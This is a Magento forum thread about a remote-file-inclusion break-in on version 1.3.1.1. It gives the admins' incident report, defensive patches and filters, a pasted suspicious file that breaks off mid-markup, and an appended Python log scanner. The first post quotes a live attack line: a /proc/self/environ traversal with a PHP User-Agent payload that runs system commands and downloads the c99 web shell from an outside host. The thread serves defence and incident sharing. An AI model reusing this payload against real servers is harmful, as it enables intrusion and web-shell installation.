Magento Forum

   
Magento 1.3.1.1 Remote File Inclusion Vulnerability
 
miromedia
Jr. Member
 
Total Posts:  8
Joined:  2009-04-08
Kenilworth UK
 

Hello All

One of our clients recently suffered an RFI hack whilst running version 1.3.1.1 of Magento. Below is my report on what happened (as far as we could tell from server logs); names and places have been changed to protect the identity of the client.

-----------------------
The hacks suffered by the site were a result of external users exploiting certain weaknesses within the Magento code base. These weaknesses allowed hackers to upload and run code directly on the web server in a type of attack known as Remote File Inclusion (RFI).

In this RFI hack the user exploited parts of the code which are vulnerable in version 1.3.1.1 of Magento. One of the hack attempts appeared via the URL used to compare products on the site, this entry being captured in the Apache logs for the domain:

91.121.11.142 - - [XX/XX/XXXX:16:32:46 +0100] "GET /catalog/product_compare/add/pr...aGFpbi5odG1sP19fX1NJRD1V//index2.php?option=com_product&controller;=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ&#x00; HTTP/1.1" 200 2178 "-" "Mozilla/5.0 XHOSTNAME<?php echo system('hostname;echo  ;'); ?>XHOSTNAMEXSIP<?php echo $_SERVER['SERVER_ADDR']; ?>XSIPXUNAME<?php echo system('uname -a;echo  ;'); ?>XUNAMEXUSERID<?php echo system('id;echo  ;'); ?>XUSERIDXPWD<?php echo system('pwd;echo  ;'); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system('lwp-download http://tools.quickhw.com/c99.txt;mv c99.txt memek.php; chmod 755 memek.php; ls -al memek.php; echo    ; exit;'); ?></pre>EXPLORE"

This example shows the hacker has passed a number of variables as part of the HTTP request after the index.php?, including commands to download the shell file c99.txt and then rename it to memek.php (using the shell command mv c99.txt memek.php). The memek.php file can now be executed externally within a browser. This exploit in Magento was closed by returning false from the getAddUrl() function in the Magento code base file:

app/code/core/Mage/Catalog/Helper/Product/Compare.php

The getAddUrl() function would then read:

public function getAddUrl($product)
{
    # return $this->_getUrl('catalog/product_compare/add', $this->_getUrlParams($product));
    # We disable compare functionality by commenting out the real return statement and returning false instead.
    return false;
}

In addition to closing potential security risks within Magento’s code, we also added changes at source on the server to prevent hack attempts from gaining access in the first place and restricted the use of some shell commands typically used in RFI attacks. These changes include updating permissions on the wget, curl and lynx commands so only the root user can execute them. To be a root user on the server a hacker would need to know the root user password as well as getting the hacked files uploaded.

Further restrictions were put in place on the server with the use of the PHP plugin mod_security. This allows the server to fully log HTTP requests and responses made to and from the server and monitor these requests to ensure that no malicious attacks can be made, by filtering out particular characters or data before it gets to the web server. What is allowed or denied by the plugin is defined by its rulesets, and these can be as restrictive or open as required. Typically the module will stop attacks in the form of HTML or CSS code being passed via the request URL along with other code requests.

---------------------------------------

Since implementing the changes detailed above we have not seen any further successful attacks, although there have been attempts made. This is clearly a very important security flaw with the Magento and/or Zend Framework code that everyone needs to be aware of, as hacks of this type could prove catastrophic for the client and result in down time or complete loss of service.

If anyone knows if these problems have been fixed in Magento version 1.4 we would be very grateful for the info.

Andrew

 
chefbri
Jr. Member
 
Total Posts:  11
Joined:  2008-11-02
Albuquerque New Mexico
 

I just found this file type in my site using 1.3.1

I don’t know what this code would do?

Can I just upgrade and have all code removed that way or do I have to go through all the files and look for added code?

Thanks,
Brian

<?php ob_start() ?>
<?php
if ($_GET['randomId'] != "kzlAcKtApisYhnXJV8GFeAmvdRH5vPOvOUFzhxjq9R7Od_DDHCBgFQ_MDXEH8bn1qsHCQOqMp8DSLVCAjw7tUAIx0QIrfOfZhJ8uVJT7HenaAINAaOO1R51h7wn3wVVC2HtTM9lQpcx3NgP0I2cZWfyjdiXJFmxacXQWpFlZcumxvWp3I2AjyBekHjHancwI5WOc11jQHgvyBOrNIBtqnyMIiXfxdQ9FSqQcVusV3DDWGAwzu7mxtDGWYAvIhp3j") {
    echo "Access Denied";
    exit();
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Editing password_new.html</title>
<meta http-equiv="Content-Type" content="text/html; charset=us-ascii">
<style type="text/css">body {background-color:threedface; border: 0px 0px; padding: 0px 0px; margin: 0px 0px}</style>
</head>
<body>
<div align="center">

<div id="saveform" style="display:none;">
<form METHOD="POST" name=mform action="http://www.leatherlingerie.org:2082/frontend/x3/filemanager/savehtmlfile.html">
<input type="hidden" name="charset" value="us-ascii">
<input type="hidden" name="baseurl" value="http://leatherlingerie.org/app/locale/en_US/template/email/">
<input type="hidden" name="basedir" value="/home/leatherl/public_html/">
<input type="hidden" name="udir" value="/home/leatherl/public_html/app/locale/en_US/template/email">
<input type="hidden" name="ufile" value="password_new.html">
<input type="hidden" name="dir" value="&#x2f;home&#x2f;leatherl&#x2f;public_html&#x2f;app&#x2f;locale&#x2f;en_US&#x2f;template&#x2f;email">
<input type="hidden" name="file" value="password_new.html">
<input type="hidden" name="doubledecode" value="1">
<textarea name=page rows=1 cols=1>

 
edmondscommerce
Guru
 
Total Posts:  342
Joined:  2008-08-26
 

This has been discussed.

See this thread:

http://www.magentocommerce.com/boards/viewthread/206501/P0/

Thanks for bringing it up though.

It's not yet totally clear if 1.4 is affected or not.

 
 
J_T_
Moderator
 
Total Posts:  1961
Joined:  2008-08-07
London-ish, UK
 

Rather than disabling Magento’s compare feature this way, wouldn’t it be better to change what feeds the _getUrlParams function instead?

Now in Mage Core Helper URL.php:

public function getEncodedUrl($url=null)
{
    if (!$url) {
        $url = $this->getCurrentUrl();
    }
    return $this->urlEncode($url);
}

Pseudo-code that sanitises against proc self environ attacks:

public function getEncodedUrl($url=null)
{
    if (!$url) {
        $url = $this->getCurrentUrl();
    }
    // Refuse to encode any URL that contains a reference to /proc/self/environ
    if (strpos($url, 'proc/self/environ') === false) {
        return $this->urlEncode($url);
    } else {
        return false;
    }
}

That can then be expanded to disallow a number of URL based attacks, like parameters containing <string> etc.

 
 
J_T_
Moderator
 
Total Posts:  1961
Joined:  2008-08-07
London-ish, UK
 

Another method, which I’m applying on somebody’s install on a cheap host which doesn’t give me a full set of the usual security tools…

In index.php:

if ((isset($_GET['controller']) && strpos($_GET['controller'], '/proc/self/environ') !== false)
    OR (strpos($_SERVER['REQUEST_URI'], '/proc/self/environ') !== false)) {
    // Attack
    exit('<!-- Not Welcome-->');
}

That seems to at least stop that one specific attack in its tracks.
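
As an added example (not part of any post in this thread), a small Python scanner that applies the checks discussed above to Apache log lines of the kind shown in the first post: it percent-decodes the request path before looking for the traversal to /proc/self/environ, so it also catches encoded variants that a strpos on the raw REQUEST_URI would miss, and it flags PHP tags in the User-Agent header, which is the payload such an inclusion executes. The log lines are constructed samples, not the client's real log.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format (not the client's real log).
SAMPLE_LOG = '''
10.0.0.5 - - [01/Jan/2010:10:00:00 +0100] "GET /catalog/product_compare/add/product/42/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [01/Jan/2010:10:00:01 +0100] "GET /index.php?option=com_x&controller=../../../../proc/self/environ%00 HTTP/1.1" 200 2178 "-" "Mozilla/5.0 <?php echo system('id'); ?>"
10.0.0.7 - - [01/Jan/2010:10:00:02 +0100] "GET /index.php?controller=%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron HTTP/1.1" 200 99 "-" "Mozilla/5.0"
'''

# %h %l %u [%t] "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "(.*)"$')
PHP_TAG_RE = re.compile(r'<\?(php\b|=)', re.IGNORECASE)

def normalize(path):
    """Undo (double) percent-encoding, drop NUL bytes and repeated slashes, lower-case."""
    decoded = unquote(unquote(path))
    return re.sub(r'/+', '/', decoded.replace('\x00', '')).lower()

def classify(line):
    """Return the indicator names found in one log line ([] for a clean line)."""
    m = LOG_RE.match(line)
    if not m:
        return ['unparseable']
    _ip, _ts, _method, path, _status, user_agent = m.groups()
    findings = []
    norm = normalize(path)
    if '../' in norm:
        findings.append('path_traversal')
    if '/proc/self/environ' in norm:
        findings.append('proc_self_environ')
    if '\x00' in unquote(path):
        findings.append('null_byte')
    # PHP tags in the User-Agent: the code that a /proc/self/environ inclusion executes.
    if PHP_TAG_RE.search(user_agent):
        findings.append('php_in_user_agent')
    return findings

def scan(log_text):
    """Return (client_ip, status, findings) for each flagged line; a 200 means the request was served."""
    hits = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify(line)
        if findings:
            hits.append((m.group(1), int(m.group(5)), findings))
    return hits
```

Flagged requests that were answered with a 200 are the ones to follow up on the filesystem, as the original report did by checking for the dropped memek.php.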

 